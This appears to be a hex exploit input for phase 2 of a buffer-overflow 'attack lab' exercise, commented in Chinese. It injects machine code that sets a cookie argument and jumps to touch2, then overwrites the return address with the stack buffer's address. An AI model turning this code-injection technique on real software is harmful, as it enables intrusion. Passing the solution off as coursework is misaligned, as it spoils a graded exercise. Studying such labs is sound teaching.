/* Phase 2: 注入代码调用touch2(cookie) */
/* cookie: 0x1c2a3245 */
/* touch2地址: 0x401c27 */
/* buf地址: 0x55685ea8 (根据栈分析计算) */
/* 注入代码: 13字节 */
48 c7 c7 45 32 2a 1c    /* movq $0x1c2a3245, %rdi */
68 27 1c 40 00          /* pushq $0x401c27 */
c3                      /* ret */
00 00 00 00 00 00 00    /* 7 bytes padding */
00 00 00 00             /* 4 bytes padding (共24字节填充缓冲区) */
a8 5e 68 55 00 00 00 00 /* 返回地址: 0x55685ea8 (buf地址, 注入代码位置) */
